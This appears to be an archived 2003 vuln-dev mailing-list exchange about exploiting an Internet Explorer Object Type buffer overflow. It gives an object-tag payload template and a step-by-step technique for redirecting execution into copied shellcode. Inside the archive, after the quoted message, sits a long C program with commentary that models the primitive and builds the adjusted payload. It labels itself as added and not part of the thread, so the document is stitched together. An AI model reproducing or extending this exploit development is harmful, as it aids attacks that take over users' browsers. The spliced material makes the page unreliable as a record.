RE: Exploiting new IE Object Type Overflow

From: Brett Moore (brettat_private)
Date: Thu Jun 05 2003 - 20:16:16 PDT

    IE version:6.0.2800.1106
    
    I too seem unable to replicate the overflow in the way described in the eEye
    advisory, but there's always more than one way to skin a cat.
    
    <object type="[/x64]AAAAAAAAAAAAXXXXNOPSLIDESHELLCODE">Cooler Than Centra Spike</object>
    
    causes an exception: "0x70bf6c55" referenced memory at "0x58585858", which
    can't be written.
    
    70BF6C55   mov         byte ptr [edi],al
    
    By supplying a valid 'writeable' address we bypass this exception and end
    up with:
    
    Unhandled exception. Access Violation at 0x41414141.
    
    Having a look at the address that we used for the valid writeable address,
    we can see a full copy of our exploit string.
    
    Thus if we plug our writeable address in instead of X, the write will copy
    our shellcode to our 'known' writeable address space. Then by using an
    adjusted value for the AAAA we can jump straight to the 'known' location of
    our shellcode.
    
    Hopefully Drew will make some comments around the differences between
    these. Perhaps different buffer sizes affect different versions differently?
    
    Brett
    
    -----Original Message-----
    From: Dave [mailto:chaboyd77at_private]
    Sent: Thursday, June 05, 2003 3:45 PM
    To: vuln-devat_private
    Subject: Exploiting new IE Object Type Overflow
    
    Hi,
    
    I've had really good success with basic overflows and have been trying to
    attempt something moderate+. I've successfully duplicated the overflow (IE
    Object Type) (ESP doesn't seem to be overwritten, but EDI is). However,
    since the value located in EDI is referenced, can program flow be
    controlled? I just can't seem to do anything with EDX as stated in the
    eEye advisory.
    
    "This allows us to take control of key registers so as to run code that we
    specify, which will be available at the EDX register."
    
    On my system (2000 Pro SP3) EDX always has a value of 0 and nothing I do
    changes its value or any other register's value (besides EDI). Also, this
    is different from a regular stack overflow, as placing the address of a JMP
    ESP in EDI doesn't always seem to be guaranteed to point to my code.
    
    Is there something really easy I'm missing here?
    Thanks,
    Dave
    
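The primitive Brett describes above (a byte-copy loop whose destination pointer comes from the object type string, followed by a transfer of control to another dword from that string) can be modelled outside the browser to check the payload arithmetic before touching IE. The following is an added example, not code from the thread, from eEye or from Internet Explorer: memory is a small flat arena standing in for the "known writeable" region, the arena base address and the byte offsets at which the AAAA and XXXX dwords are consumed are assumptions chosen for the model, and the shellcode is a placeholder of int3 bytes. It reproduces the two crashes in the post in order (write fault at 0x58585858, then execution fault at 0x41414141 with a full copy of the string sitting at the writeable address) and then the adjusted string that lands EIP inside the copied NOP sled.

```c
/*
 * Model of the primitive described in the post, NOT Internet Explorer code.
 * A byte-copy loop ("mov byte ptr [edi],al") writes the attacker string to a
 * pointer taken from the string itself ("XXXX"), then a dword from the string
 * ("AAAA") ends up as EIP. The arena, its base address and the dword offsets
 * below are assumptions made for this model.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define EIP_OFFSET   8            /* assumed: which quartet of 'A's reaches EIP */
#define DEST_OFFSET 12            /* "XXXX": the dword that lands in EDI */
#define SLED_OFFSET 16            /* NOP sled begins here, shellcode follows */
#define SLED_LEN    32

#define ARENA_BASE  0x00130000u   /* constructed address of the writeable region */
#define ARENA_SIZE  4096u

enum { RUN_OK = 0, FAULT_WRITE = -1, FAULT_EXEC = -2 };

struct run { int status; uint32_t addr; int copy_intact; };

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Byte-copy then transfer control, mirroring the two exceptions quoted in the
 * post. *addr receives the faulting address, or EIP on success (a success means
 * EIP points at a NOP byte inside the arena, i.e. inside the copied sled). */
static int model_copy_and_jump(const uint8_t *s, size_t n, uint8_t *arena, uint32_t *addr) {
    uint32_t edi = rd32(s + DEST_OFFSET);
    if (edi < ARENA_BASE || edi + n > ARENA_BASE + ARENA_SIZE) {
        *addr = edi;                          /* "memory at 0x58585858 can't be written" */
        return FAULT_WRITE;
    }
    for (size_t i = 0; i < n; i++)            /* mov byte ptr [edi],al ; inc edi ; ... */
        arena[edi - ARENA_BASE + i] = s[i];
    uint32_t eip = rd32(s + EIP_OFFSET);
    if (eip < ARENA_BASE || eip >= ARENA_BASE + ARENA_SIZE || arena[eip - ARENA_BASE] != 0x90) {
        *addr = eip;                          /* "Access Violation at 0x41414141" */
        return FAULT_EXEC;
    }
    *addr = eip;
    return RUN_OK;
}

/* The string as first posted: 12 'A's, "XXXX", NOP sled, shellcode. */
static size_t build_naive(uint8_t *out, const uint8_t *sc, size_t sc_len) {
    memset(out, 'A', 12);
    memset(out + DEST_OFFSET, 'X', 4);
    memset(out + SLED_OFFSET, 0x90, SLED_LEN);
    memcpy(out + SLED_OFFSET + SLED_LEN, sc, sc_len);
    return SLED_OFFSET + SLED_LEN + sc_len;
}

/* Brett's adjustment: XXXX becomes the known writeable address W, so the copy
 * lands the whole string at W; AAAA becomes W + (offset of the sled) so EIP
 * lands in the middle of the copied NOP sled. */
static size_t build_adjusted(uint8_t *out, uint32_t w, const uint8_t *sc, size_t sc_len) {
    size_t n = build_naive(out, sc, sc_len);
    wr32(out + DEST_OFFSET, w);
    wr32(out + EIP_OFFSET, w + SLED_OFFSET + SLED_LEN / 2);
    return n;
}

/* Stage 0: string as posted. Stage 1: only XXXX replaced by a writeable
 * address. Stage 2: XXXX and AAAA both adjusted. copy_intact reports whether
 * a full copy of the string now sits at W, as observed in the post. */
static struct run demo_stage(int stage) {
    static uint8_t arena[ARENA_SIZE];
    static const uint8_t sc[] = { 0xCC, 0xCC, 0xCC, 0xCC };  /* placeholder shellcode (int3) */
    const uint32_t w = ARENA_BASE + 0x100;                   /* constructed "known writeable" address */
    uint8_t s[256];
    struct run r;
    size_t n = build_naive(s, sc, sizeof sc);
    if (stage >= 1) wr32(s + DEST_OFFSET, w);
    if (stage >= 2) n = build_adjusted(s, w, sc, sizeof sc);
    memset(arena, 0, sizeof arena);
    r.status = model_copy_and_jump(s, n, arena, &r.addr);
    r.copy_intact = memcmp(arena + (w - ARENA_BASE), s, n) == 0;
    return r;
}

int main(void) {
    for (int stage = 0; stage < 3; stage++) {
        struct run r = demo_stage(stage);
        printf("stage %d: status %d at 0x%08x, copy at W intact: %d\n",
               stage, r.status, r.addr, r.copy_intact);
    }
    return 0;
}
```

The three stages print the progression from the post: a write fault at 0x58585858, then an execution fault at 0x41414141 with the string copied intact to W, then EIP resting on a NOP inside the copy. Against the real target the offsets `EIP_OFFSET` and `DEST_OFFSET` have to be measured in the debugger, since the post does not say which of the twelve 'A's reach EIP.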
    This archive was generated by hypermail 2b30 : Fri Jun 06 2003 - 11:08:50 PDT